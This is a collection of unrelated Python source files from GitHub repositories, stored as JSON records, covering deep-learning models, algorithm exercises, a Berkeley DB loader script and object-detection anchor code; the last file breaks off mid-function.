main_path = concatenate([main_path, from_encoderF[0], from_encoder[0]], axis=-1)\n main_path = res_block(main_path, [16, 16], [(1, 1, 1), (1, 1, 1)])\n\n return main_path\n\ndef res_block_attention(x, filter):\n\tres_path = Conv3D(filters=filter, kernel_size=(3, 3, 3), padding='same',kernel_initializer='he_normal')(x)\n\tres_path = BatchActivate(res_path)\n\tres_path = Conv3D(filters=filter, kernel_size=(3, 3 ,3), padding='same',activation='relu',kernel_initializer='he_normal')(res_path)\n\tshortcut = Conv3D(filter, kernel_size=(1, 1, 1))(x)\n\tshortcut = LeakyReLU(0.2)(shortcut)\n\tres_path = add([shortcut, res_path])\n\treturn res_path\n\ndef my_attention(X,Y,Z):\n #X某一类组织\n # Y 背景\n #Z T1图像\n x0 = concatenate([X,Z],axis=-1)\n x1 = res_block_attention(x0, 32)\n x2 = res_block_attention(x1,32)\n x3 = Conv3D(1,kernel_size=(1,1,1),padding='same',activation='sigmoid')(x2)\n ##Self-strengh part\n x4 = Lambda(lambda x: 1+x)(x3)\n x5 = Multiply()([x4,X])\n ## BG-strength part\n y1 = Lambda(lambda x: 2-x)(Y)\n y2 =Multiply()([y1,x3])\n z = add([x5,y2])\n z = res_block_attention(z, 32)\n #k = Conv3D(1, kernel_size=(1, 1, 1), padding='same', activation='sigmoid')(z)\n return z\n\ndef SAM(F1,F2,filter):\n ##F1为encoder路径的特征图\n ##F2为decoder路径的特征图\n ##filter为encoder路径的大小\n Max = MaxPooling3D()(F2)\n Avg = AveragePooling3D()(F2)\n MA = concatenate([Max,Avg],axis=-1)\n d3 = Conv3D(filter,kernel_size=(3,3,3),dilation_rate=(1,1,1),activation='relu',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(MA)\n d5 = Conv3D(filter,kernel_size=(3,3,3),dilation_rate=(2,2,2),activation='relu',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(MA)\n d7 = Conv3D(filter,kernel_size=(3,3,3),dilation_rate=(5,5,5),activation='relu',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(MA)\n d = concatenate([d3,d5,d7],axis=-1)\n du = UpSampling3D((2,2,2))(d)\n A2 = Conv3D(filter,kernel_size=(1,1,1),activation='sigmoid',padding='same',kernel_initializer=RandomNormal(mean=0.0, stddev=1e-5))(du)\n A = multiply([A2,F1])\n return A\n\n\ndef mutil_scale_decoder(x, from_encoder,from_encoderF):\n main_path1 = UpSampling3D(size=(2, 2, 2))(x)\n main_path11 = concatenate([main_path1, from_encoderF[3],from_encoder[3]], axis=-1)\n main_path111 = SAM(main_path1,main_path11,256)\n main_path1 = res_block(main_path111, [128, 128], [(1, 1,1), (1,1, 1)]) #8,8,8,128\n\n main_path2 = UpSampling3D(size=(2, 2, 2))(main_path1)\n main_path22 = concatenate([main_path2, from_encoderF[2],from_encoder[2]], axis=-1)\n main_path2 = SAM(main_path2, main_path22, 128)\n main_path2 = res_block(main_path2, [64, 64], [(1, 1,1), (1, 1,1)]) #16,16,16,64\n\n main_path3 = UpSampling3D(size=(2, 2, 2))(main_path2)\n main_path33 = concatenate([main_path3, from_encoderF[1],from_encoder[1]], axis=-1)\n main_path3 = SAM(main_path3, main_path33, 64)\n main_path3 = res_block(main_path3, [32, 32], [(1, 1,1), (1, 1,1)]) #32,32,32,32\n\n\n main_path4 = UpSampling3D(size=(2, 2, 2))(main_path3)\n main_path44 = concatenate([main_path4, from_encoderF[0], from_encoder[0]], axis=-1)\n main_path4 = SAM(main_path4, main_path44, 32)\n main_path4 = res_block(main_path4, [16, 16], [(1, 1, 1), (1, 1, 1)]) #64,64,64,16\n\n return main_path1,main_path2,main_path3,main_path4\n\n\ndef ResNetR3_attention_mutil_scale(input_shape, input_shape1,input_shape2,input_shape3,input_shape4):\n\n inputs = Input(shape=input_shape) #T1\n I = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs)\n I = 
LeakyReLU(0.2)(I)\n inputs1 = Input(shape=input_shape1)\n I1 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs1)\n I1 = LeakyReLU(0.2)(I1)\n inputs2 = Input(shape=input_shape2)\n I2 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs2)\n I2 = LeakyReLU(0.2)(I2)\n inputs3 = Input(shape=input_shape3)\n I3 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs3)\n I3 = LeakyReLU(0.2)(I3)\n inputs4 = Input(shape=input_shape4)\n I4 = Conv3D(16, kernel_size=(3, 3, 3), padding='same', kernel_initializer='he_normal')(inputs4)\n I4 = LeakyReLU(0.2)(I4)\n inputsF = concatenate([I1,I2,I3,I4],axis=-1)\n to_decoder1 = encoder(I)\n to_decoder2 = encoder(inputsF)\n to_decoder3 = concatenate([to_decoder1[3],to_decoder2[3]],axis=-1)\n path1 = res_block(to_decoder3, [256, 256], [(2, 2, 2), (1, 1, 1)])\n path1, path2, path3, path4 = mutil_scale_decoder(path1, from_encoder=to_decoder1,from_encoderF=to_decoder2)\n\n x001 = Conv3DTranspose(16,kernel_size=(1,1,1), activation='relu', strides=(8,8,8), kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path1)\n x001 = res_block_attention(x001,32)\n x8 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax',name='output8', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x001)\n\n x002 = Conv3DTranspose(16,kernel_size=(1,1,1), activation='relu', strides=(4,4,4), kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path2)\n x002 = res_block_attention(x002,32)\n x16 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax',name='output16', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x002)\n\n x003 = Conv3DTranspose(16,kernel_size=(1,1,1), activation='relu', strides=(2,2,2), kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path3)\n x003 = res_block_attention(x003,32)\n x32 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax',name='output32', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x003)\n\n x64 = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax', name='output64', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(path4)\n x = concatenate([x8,x16,x32,x64],axis=-1)\n x = res_block_attention(x,64)\n x = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax', name='output1', kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(x)\n\n BK = Lambda(lambda x: x[...,0:1])(x)\n y_tumors = Lambda(lambda x: x[...,1:2])(x)\n CSF = Lambda(lambda x: x[...,2:3])(x)\n GM = Lambda(lambda x: x[...,3:4])(x)\n WM = Lambda(lambda x: x[...,4:5])(x)\n y_tumors = my_attention(y_tumors,BK,inputs)\n CSF = my_attention(CSF,BK,inputs)\n GM = my_attention(GM,BK,inputs)\n WM = my_attention(WM,BK,inputs)\n combin = concatenate([BK,y_tumors, CSF, GM, WM], axis=-1)\n combin = res_block_attention(combin,32)\n output = Conv3D(5, kernel_size=(1, 1, 1), activation='softmax', name='output2',kernel_initializer='he_normal',bias_initializer=Constant(value=-10))(combin)\n y_tumors = Lambda(lambda x: x[..., 1:2], name='y_tumors')(output)\n CSF = Lambda(lambda x: x[..., 2:3], name='CSF')(output)\n GM = Lambda(lambda x: x[..., 3:4], name='GM')(output)\n WM = Lambda(lambda x: x[..., 4:5], name='WM')(output)\n model = Model(inputs=[inputs,inputs1,inputs2,inputs3,inputs4], outputs=[x8,x16,x32,x64,x,output,y_tumors,CSF,GM,WM])\n return model\nmodel = ResNetR3_attention_mutil_scale((64,64,64,1), 
(64,64,64,1),(64,64,64,1),(64,64,64,1),(64,64,64,1))\nmodel.summary()","repo_name":"fcfd97/GLM-Net","sub_path":"my_model.py","file_name":"my_model.py","file_ext":"py","file_size_in_byte":10152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27887708293","text":"import sys\nsys.stdin = open(\"input.txt\", \"r\")\n\nfrom heapq import heappush, heappop\n\ndef solution(start):\n dist = [9876543210 for _ in range(N+1)]\n heap = []\n\n heappush(heap, (0, start))\n total = 0\n while heap:\n t, com = heappop(heap)\n\n if not visited[com]:\n visited[com] = 1\n dist[com] = t\n total += 1\n\n for i in adj[com]:\n if not visited[i]:\n heappush(heap, (t + adj[com][i], i))\n\n MAX = 0\n for time in dist:\n if time != 9876543210:\n MAX = max(MAX, time)\n\n return total, MAX\n\n\nfor tc in range(1, int(input())+1):\n N, M, start = map(int, input().split())\n adj = [{} for _ in range(N+1)]\n visited = [0 for _ in range(N+1)]\n\n for _ in range(M):\n a, b, time = map(int, input().split())\n adj[b][a] = time\n\n print(*solution(start))","repo_name":"dth12/algorithm","sub_path":"baekjoon/10282_G4_해킹.py","file_name":"10282_G4_해킹.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"18154516258","text":"#coding=utf-8\nimport copy\n\nWEIGHT_TAG = 5\nWEIGHT_TAG_NEGA = -0.5\nWEIGHT_ROUND = 3\nWEIGHT_ROUND_NEGA = 0\n\n\ndef transTag(tags):\n assert isinstance(tags, (list, tuple)), 'tags-(%s) 不是数组或者元组类型'% tags\n newTags = []\n for tag in tags:\n assert isinstance(tags, (list, tuple)), 'tag-(%s) 不是int类型' % tag\n if tag > 18:\n tag = tag - 14\n newTags.append(tag)\n resTags = []\n for i in range(1, 43):\n if i in newTags:\n resTags.append(WEIGHT_TAG)\n else:\n resTags.append(WEIGHT_TAG_NEGA)\n return resTags\n\n\n\n\n\n\nprojDic = {}\nf1 = open('projdata.csv', 'r')\nlines = f1.readlines()\nfor line in lines:\n data = line.replace('\\n', '').split(',')\n projDic[data[0]] = data\nf1.close()\n\nbdlist = []\nf2 = open('bdresponse.csv', 'r')\nlines = f2.readlines()\nfor line in lines:\n bdlist.append(line.replace('\\n', '').split(','))\nf2.close()\n\n\ndef savedata(data):\n with open('test8-4.csv', 'a') as f:\n f.write(','.join(data))\n f.write('\\n')\n\n# for bd in bdlist:\n# if projDic[bd[0]]:\n# newlist = copy.deepcopy(projDic[bd[0]])\n# newlist[-12] = bd[1]\n#\n# newlist.append(bd[2])\n# savedata(newlist)\n\n\n\n\ndef checkPredictResult(predictList, proj_id):\n rep = False\n for org_id in predictList:\n for bd in bdlist:\n if proj_id == bd[0] and str(org_id) == bd[1] :\n newlist = copy.deepcopy(projDic[proj_id])\n newlist[-12] = str(org_id)\n newlist.append(bd[2])\n savedata(newlist)\n rep = True\n break\n if rep:\n break\n\n\n\n\npredictres = {\n '521':[7089, 6800, 28311, 7491, 23600, 5013, 33372, 4755, 10187, 7028, 6602, 30750, 30531, 4440, 847, 23596, 24255, 287, 33418, 28, 24484, 4304, 23717, 1409, 23547, 7577, 30161, 716, 909, 31095, 7566, 24417, 13676, 4589, 160, 4425, 322, 30908, 24388, 30178, 28352, 7572, 3397, 23590, 4209, 29425, 4763, 24387, 4927, 4872]\n}\n\nfor key, value in predictres.items():\n checkPredictResult(value, key)\n\n","repo_name":"wujunke/pythons","sub_path":"python/emptygit/tfdata/data2/transBDResponse.py","file_name":"transBDResponse.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"3711091188","text":"T=int(input())\nfor _ in 
range(1,T+1):\n t=int(input())\n D={}\n L=list(map(int,input().split()))\n for l in L:\n if l not in D.keys():\n D[l]=1\n else:\n D[l]+=1\n m=max(D.values())\n ML=[key for key in D.keys() if D[key]==m]\n print(f'#{t} {max(ML)}')","repo_name":"koreamarin/09.Coding_test","sub_path":"Python/02.SWEA/D2/1204_최빈수_구하기.py","file_name":"1204_최빈수_구하기.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32511108128","text":"#LAB.12 -โปรแกรมหาผลรวม/ค่าเฉลี่ย *ประยุกค์การใช้คำสั่ง while\r\nusernum = int(input(\"ป้อนจำนวนรอบ :\")) #inputนับจำนวนรอบ\r\ncount = 0 #ตัวแปรนับจำนวนรอบ\r\nsumObj = 0 #ตัวแปรเก็บค่าผลรวม\r\nwhile(count>=0):\r\n score=int(input(\"ป้อนตัวเลขmที่ %d :\"%(count+1)))\r\n sumObj+=score\r\n count+=1\r\n if(count==usernum):\r\n break\r\nprint(\"ผลรวมตัวเลข =%d:\"%sumObj) \r\nprint(\"หาค่าเฉลี่ย : %d\"%(sumObj/count))\r\n","repo_name":"chatchard47/python_basic","sub_path":"lab12.py","file_name":"lab12.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23536740961","text":"from rich.console import Console\nfrom genericworker import *\nfrom RoboCompImageBasedGestureRecognition import *\nimport traceback\nimport numpy as np\nimport time\nimport cv2\nimport pickle as pkl\n\nsys.path.append('/opt/robocomp/lib')\nconsole = Console(highlight=False)\n\n\nclass Timer:\n def __init__(self, fps):\n self.fps = fps\n self.ms = 1000 / fps\n self.tick = None\n\n # tock - current time in milliseconds\n def isReady(self, tock):\n if self.tick is None or tock - self.tick > self.ms:\n self.tick = tock\n return True\n return False\n\n\ncurrent_milli_time = lambda: int(round(time.time() * 1000))\n\n\nclass SpecificWorker(GenericWorker):\n def __init__(self, proxy_map, startup_check=False):\n super(SpecificWorker, self).__init__(proxy_map)\n self.timer.timeout.connect(self.compute)\n self.Period = 30\n self.timer.start(self.Period)\n # self.visualizer = Visualizer()\n self.cam_timer = Timer(fps=30)\n self.inference_timer = Timer(fps=10)\n self.capL = cv2.VideoCapture(0)\n\n self.max_num_images = 64\n self.list_frames = []\n\n self.wlasl_class = pkl.load( open(\"src/wlasl_name.pkl\", \"rb\" ) )\n\n self.last_class = \"\"\n self.font = cv2.FONT_HERSHEY_SIMPLEX\n self.classes = {}\n\n def __del__(self):\n console.print('SpecificWorker destructor')\n\n def setParams(self, params):\n return True\n\n @QtCore.Slot()\n def compute(self):\n now = current_milli_time()\n cam_ready = self.cam_timer.isReady(now)\n if cam_ready:\n retL, self.frameL = self.capL.read()\n if self.frameL is not None:\n if self.last_class != \"\":\n cv2.putText(self.frameL, self.last_class, (20,20), self.font, 10, (0,0,0), 2)\n cv2.imshow(\"visual\", self.frameL)\n self.list_frames.append(self.frameL)\n\n if self.inference_timer.isReady(now) and len(self.list_frames) >= self.max_num_images:\n input = TVideo()\n\n input.images = np.stack(self.list_frames, axis=0)\n input.height, input.width, input.depth = self.list_frames[0].shape\n input.numFrames = len(self.list_frames)\n\n self.list_frames = self.list_frames[len(self.list_frames)//2:]\n output = self.imagebasedgesturerecognition_proxy.getGesture(input)\n\n if output.gestureProb[0] > 0.25:\n print(\"top 5 actions\")\n action = []\n for ele in output.gestureIndex:\n action.append(self.wlasl_class[int(ele)])\n print(action)\n print(output.gestureProb)\n self.last_class = action[0]\n\n if 
action[0] not in self.classes:\n self.classes[action[0]] = 1\n else:\n self.classes[action[0]] +=1\n print(self.classes)\n else:\n print(\"nothing\")\n self.last_class = \"\"\n\n return True\n\n def startup_check(self):\n import time\n time.sleep(0.2)\n exit()\n\n ######################\n # From the RoboCompCameraSimple you can call this methods:\n # self.camerasimple_proxy.getImage(...)\n\n ######################\n # From the RoboCompCameraSimple you can use this types:\n # RoboCompCameraSimple.TImage\n\n ######################\n # From the RoboCompImageBasedGestureRecognition you can call this methods:\n # self.imagebasedgesturerecognition_proxy.getGesture(...)\n\n ######################\n # From the RoboCompImageBasedGestureRecognition you can use this types:\n # RoboCompImageBasedGestureRecognition.TVideo\n # RoboCompImageBasedGestureRecognition.GestureResult\n","repo_name":"robocomp/robocomp-robolab","sub_path":"components/detection/test/imageBasedGestureRecognitionClient/src/specificworker.py","file_name":"specificworker.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"79"} +{"seq_id":"32131247919","text":"def rabin_karp_match(txt, pat):\n M = len(pat)\n N = len(txt)\n d = 256 # number of characters in the input alphabet\n q = 101 # prime number\n p = 0 # hash value for pattern \n t = 0 # hash value for input text\n pos = []\n # Rabin-Karp algorithm\n h = d**(M-1) % q\n # hash value of pattern and first window of text \n for i in range(M):\n p = (d*p + ord(pat[i])) % q\n t = (d*t + ord(txt[i])) % q\n # slide the pattern over text one by one \n for i in range(N - M+1):\n # check the hash values of current window of text and pattern\n # if the hash values match then only...\n if p == t: \n # ...check for characters (one by one)\n if pat == txt[i:i+M]:\n pos.append(i)\n \n # calculate hash value for next window of text:\n # remove leading digit, add trailing digit\n if i < N-M: \n t = (d * (t-ord(txt[i]) * h) + ord(txt[i+M])) % q\n # it might result in negative values of t\n if t < 0:\n t = t + q\n return pos\n\nif __name__ == \"__main__\":\n s = \"The building fronts are just fronts, to hide the people watching.\"\n print(s)\n\n sub = \"front\"\n match = rabin_karp_match(s, sub)\n print(\n \"The substring '{}' is present at {} position(s): {}.\"\n .format(sub, len(match), match)\n )\n sub = \"ing\"\n match = rabin_karp_match(s, sub)\n print(\n \"The substring '{}' is present at {} position(s): {}.\"\n .format(sub, len(match), match)\n )","repo_name":"alexmadrinanfdez/basic-python","sub_path":"algos/search/string/rabin_karp.py","file_name":"rabin_karp.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29329368135","text":"# Assignment: Mini Project 1\n# Due Date: October, 27 2015\n# Name: Ismail Mare, Janice Loo, Preyanshu Kumar\n# Unix ID: imare, jloo, preyansh\n# StudentID: 1388973, 1359624, 1395321\n# Lecture Section: B1\n# Instructor: Davood Rafiei\n#---------------------------------------------------------------\n#\n \n#importing necessary libraries\nimport sys\nimport datetime\nimport math\nimport random\nimport time\nimport string\nimport sys\nimport subprocess\nimport re\nfrom bsddb3 import 
db\n\n\n\n\n\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n\n\n\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#PHASE 2\n\n\ndef db_load_prep(filename):\n\ttarget=open(filename,'r')\n\twrite=(filename.split('.'))[0]+\"_load\"+\".txt\"\n\twrite1=open(write,'w')\n\tfor line in target:\n\t\tsecond_half=''\n\t\tcontents=line.split(',')\n\t\twrite1.write(contents[0])\n\t\twrite1.write('\\n')\n\t\tfor i in range(1,len(contents)):\n\t\t\tsecond_half+=contents[i]\n\t\twrite1.write(second_half)\n\ttarget.close()\n\twrite1.close()\n\treturn\n\n\n\n\ndef db_load_prep_reviews(filename):\n\ttarget=open(filename,'r')\n\twrite=(filename.split('.'))[0]+\"_load\"+\".txt\"\n\twrite1=open(write,'w')\n\tfor line in target:\n\t\tsecond_half=''\n\t\tcontents=line.split(',')\n\t\twrite1.write(contents[0])\n\t\twrite1.write('\\n')\n\t\tfor i in range(1,len(contents)):\n\t\t\tif i > 1:\n\t\t\t\tsecond_half+=\",\"+contents[i]\n\t\t\telse:\n\t\t\t\tsecond_half+=contents[i]\n\t\twrite1.write(second_half)\n\ttarget.close()\n\twrite1.close()\n\n\n\ndef phase2():\n\tsubprocess.call('sort rterms.txt | uniq -u',shell=True)\n\tsubprocess.call('sort pterms.txt | uniq -u',shell=True)\n\tsubprocess.call('sort scores.txt | uniq -u', shell=True)\n\n\tdatabase_rw = db.DB()\n\tdatabase_pt = db.DB()\n\tdatabase_rt = db.DB()\n\tdatabase_sc = db.DB()\n\n\tdatabase_sc.set_flags(db.DB_DUP) \n\tdatabase_rt.set_flags(db.DB_DUP) \n\tdatabase_pt.set_flags(db.DB_DUP)\n\n\n\tdatabase_rw.open(\"rw.idx\",None,db.DB_HASH,db.DB_CREATE)\n\tdatabase_pt.open(\"pt.idx\",None,db.DB_BTREE,db.DB_CREATE)\n\tdatabase_rt.open(\"rt.idx\",None,db.DB_BTREE,db.DB_CREATE)\n\tdatabase_sc.open(\"sc.idx\",None,db.DB_BTREE,db.DB_CREATE)\n\n\t#db_load_prep(\"scores.txt\") #Now files loaded for db called: scores_load.txt\n\t#db_load_prep(\"pterms.txt\") #Now files loaded for db called: pterms_load.txt\n\t#db_load_prep(\"rterms.txt\") #Now files loaded for db called: rterms_load.txt\n\t#db_load_prep_reviews(\"reviews.txt\") #Now files loaded for db called: reviews_load.txt\n\n\tcurs_rw=database_rw.cursor()\n\t#subprocess.call('db_load -f reviews_load.txt -T -t hash rw.idx',shell=True)\n\tsubprocess.call('cat reviews.txt |./perl_script.pl | db_load -T -t hash rw.idx',shell=True)\n\t#test#################\n\t#iter = curs_rw.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_rw.next()\n\t######################\n\n\tcurs_rw.close()\n\tdatabase_rw.close()\n\n\tcurs_rt=database_rt.cursor()\n\t#subprocess.call('db_load -f rterms_load.txt -T -t btree rt.idx',shell=True)\n\tsubprocess.call('cat rterms.txt |./perl_script.pl | db_load -T -t btree rt.idx',shell=True)\n\t#test#################\n\t#iter = curs_rt.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_rt.next()\n\t######################\n\n\tcurs_rt.close()\n\tdatabase_rt.close()\n\n\tcurs_pt=database_pt.cursor()\n\t#subprocess.call('db_load -f pterms_load.txt -T -t btree pt.idx',shell=True)\n\tsubprocess.call('cat pterms.txt |./perl_script.pl | db_load -T -t btree pt.idx',shell=True)\n\t#test#################\n\t#iter = curs_pt.first()\n\t#while 
iter:\n\t#\tprint(iter)\n\t#\titer=curs_pt.next()\n\t######################\n\n\tcurs_pt.close()\n\tdatabase_pt.close()\n\n\tcurs_sc=database_sc.cursor()\n\t#subprocess.call('db_load -f scores_load.txt -T -t btree sc.idx',shell=True)\n\tsubprocess.call('cat scores.txt |./perl_script.pl | db_load -T -t btree sc.idx',shell=True)\n\t#test#################\n\t#iter = curs_sc.first()\n\t#while iter:\n\t#\tprint(iter)\n\t#\titer=curs_sc.next()\n\t######################\n\n\tcurs_sc.close()\n\tdatabase_sc.close()\n\n\treturn \n\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n#---------------------------------------------------------------\n\n\n\n\n# Main()\n\n\ndef main():\n\tphase2()\n\treturn\n\n\n\n\n\n\nmain()\n","repo_name":"ismailmare/c291g05-Proj-2","sub_path":"phase2.py","file_name":"phase2.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71156554494","text":"def solution(prices):\n answer = [0 for _ in range(len(prices))]\n\n stack = []\n\n for i, p in enumerate(prices):\n if not stack:\n stack.append([i, p])\n continue\n \n if stack[-1][1] <= p: \n stack.append([i, p])\n continue\n\n while stack:\n if stack[-1][1] <= p: break\n\n top = stack.pop(-1)\n answer[top[0]] = i - top[0]\n\n stack.append([i, p])\n \n while stack:\n top = stack.pop(-1)\n\n answer[top[0]] = len(prices) - 1 - top[0]\n \n return answer\n\nprices = [1, 2, 3, 2, 3]\nans = solution(prices)\nprint(ans)","repo_name":"praivesi/Algorithms_2","sub_path":"programmers/level2/StockPrice.py","file_name":"StockPrice.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24626395398","text":"# O Twitter é conhecido por limitar as postagens em 280\n# caracteres. Conferir se um texto vai caber em um tuíte é o\n# desafio.\n\n# Entrada:\n\n# A entrada é uma linha de texto.\n\n# Saída:\n\n# A saída é dada em uma única linha. Ela deve ser TWEET se\n# a linha de texto conter até 280 caracteres. Se a entrada da\n# linha texto tiver mais 280 caracteres, a saída deve ser \"Esse\n# texto é maior que o esperado\".\n\ntweet = input('O que você está pensando hoje? 
')\n\nif len(tweet) <= 280:\n print('TWEET')\nelse:\n print('Esse texto é maior que o esperado.')","repo_name":"VICTORIAGUI/pyhton_23-11","sub_path":"desafio02.py","file_name":"desafio02.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24653284645","text":"from PIL import Image\n\n\nimgx,imgy=1024,1024 # IMAGE DIMENSIONS\nimage = Image.new(\"RGB\",(imgx,imgy)) # CREATES IMAGE ACCORDING TO DIMENSIONS\n\nfor x in range(imgx):\n\tfor y in range(imgy):\n\t\tR,G,B=int(255-(80*x/imgx)),int(179-(179*x/imgx)),int(15+(75*x/imgx))\n\t\timage.putpixel((x,y),(R,G,B)) # GLOWY MANDELBROT EFFECT\nimage.save(\"gradient.png\") # SAVES IMAGE","repo_name":"suddenlykevin/cs550mandelbrot","sub_path":"experimentation/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70050805697","text":"import sys\n\nPY2 = sys.version_info[0] == 2\n\nif not PY2:\n string_types = (str,)\n\n def logger_has_handlers(logger):\n return logger.hasHandlers()\n\nelse:\n string_types = (str, unicode)\n\n # backported from PY3 logging.Logger.hasHandlers\n def logger_has_handlers(logger):\n c = logger\n rv = False\n while c:\n if c.handlers:\n rv = True\n break\n if not c.propagate:\n break\n else:\n c = c.parent\n return rv\n","repo_name":"zhl2008/awd-platform","sub_path":"web_flaskbb/lib/python2.7/site-packages/flask_alembic/_compat.py","file_name":"_compat.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":574,"dataset":"github-code","pt":"79"} +{"seq_id":"17440574192","text":"import time\nimport torch\nimport numpy as np\nfrom utils.util import cxcy_to_xy, xy_to_cxcy\n\n\nclass FRCNNAnchorMaker(object):\n\n def __init__(self, base_size=16, ratios=[0.5, 1, 2], anchor_scales=[8, 16, 32]):\n self.base_size = base_size\n self.ratios = ratios\n self.anchor_scales = anchor_scales\n self.anchor_base = self.generate_anchor_base()\n\n def generate_anchor_base(self):\n\n px = self.base_size / 2.\n py = self.base_size / 2.\n\n anchor_base = np.zeros((len(self.ratios) * len(self.anchor_scales), 4), dtype=np.float32)\n for i in range(len(self.ratios)):\n for j in range(len(self.anchor_scales)):\n w = self.base_size * self.anchor_scales[j] * np.sqrt(self.ratios[i])\n h = self.base_size * self.anchor_scales[j] * np.sqrt(1. 
/ self.ratios[i])\n\n index = i * len(self.anchor_scales) + j\n anchor_base[index, 0] = px - w / 2.\n anchor_base[index, 1] = py - h / 2.\n anchor_base[index, 2] = px + w / 2.\n anchor_base[index, 3] = py + h / 2.\n\n return anchor_base\n\n def _enumerate_shifted_anchor(self,\n origin_image_size):\n\n origin_height, origin_width = origin_image_size\n width = origin_width // self.base_size\n height = origin_height // self.base_size\n feat_stride = self.base_size\n\n shift_x = np.arange(0, width * feat_stride, feat_stride)\n shift_y = np.arange(0, height * feat_stride, feat_stride)\n shift_x, shift_y = np.meshgrid(shift_x, shift_y)\n shift = np.stack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel()), axis=1)\n\n A = self.anchor_base.shape[0]\n K = shift.shape[0]\n anchor = self.anchor_base.reshape((1, A, 4)) + shift.reshape((1, K, 4)).transpose((1, 0, 2))\n anchor = anchor.reshape((K * A, 4)).astype(np.float32)\n\n divisor = np.array([origin_width, origin_height, origin_width, origin_height])\n anchor /= divisor\n\n return anchor\n\n\nclass FasterRCNN_Anchor(object):\n def create_anchors(self, image_size, num_pooling=4):\n print('make retina anchors')\n\n # get height and width of features\n image_height, image_width = size = image_size # h, w\n feature_height, feature_width = image_height, image_width\n\n for i in range(num_pooling):\n feature_height = feature_height // 2\n feature_width = feature_width // 2\n\n areas = [128, 256, 512]\n aspect_ratios = np.array([0.5, 1.0, 2.0])\n center_anchors = []\n\n # 4. make anchors\n for i in range(feature_height): # f_h\n for j in range(feature_width): # f_w\n c_x = (j + 0.5) / feature_width # (0-1 scaling)\n c_y = (i + 0.5) / feature_height # (0-1 scaling)\n for aspect_ratio in aspect_ratios:\n for area in areas:\n w = (area / image_width) * np.sqrt(aspect_ratio)\n h = (area / image_height) / np.sqrt(aspect_ratio)\n anchor = [c_x,\n c_y,\n w,\n h]\n center_anchors.append(anchor)\n\n center_anchors = np.array(center_anchors).astype(np.float32)\n center_anchors = torch.FloatTensor(center_anchors) # .to(device)\n\n # -------------------- 5. ignore the cross-boundary anchors --------------------\n\n # 5.1. convert corner anchors\n corner_anchors = cxcy_to_xy(center_anchors)\n\n # 5.2. 
check cross-boundary anchors\n keep = ((corner_anchors[:, 0] >= 0) & (corner_anchors[:, 1] >= 0) \\\n & (corner_anchors[:, 2] < 1) & (corner_anchors[:, 3] < 1))\n\n # center_anchors = center_anchors[keep]\n # At (600, 1000) image has 20646 all anchors but the number of cross-boundary anchors is 7652.\n\n visualization = False\n if visualization:\n\n # original\n corner_anchors = cxcy_to_xy(center_anchors)\n\n # # center anchor clamp 방식!\n # corner_anchors = cxcy_to_xy(center_anchors).clamp(0, 1)\n # center_anchors = xy_to_cxcy(corner_anchors)\n\n from matplotlib.patches import Rectangle\n import matplotlib.pyplot as plt\n\n size = 300\n img = torch.ones([size, size, 3], dtype=torch.float32)\n\n plt.imshow(img)\n axes = plt.axes()\n axes.set_xlim([-1 * size, 3 * size])\n axes.set_ylim([-1 * size, 3 * size])\n\n for anchor in corner_anchors:\n x1 = anchor[0] * size\n y1 = anchor[1] * size\n x2 = anchor[2] * size\n y2 = anchor[3] * size\n\n plt.gca().add_patch(Rectangle(xy=(x1, y1),\n 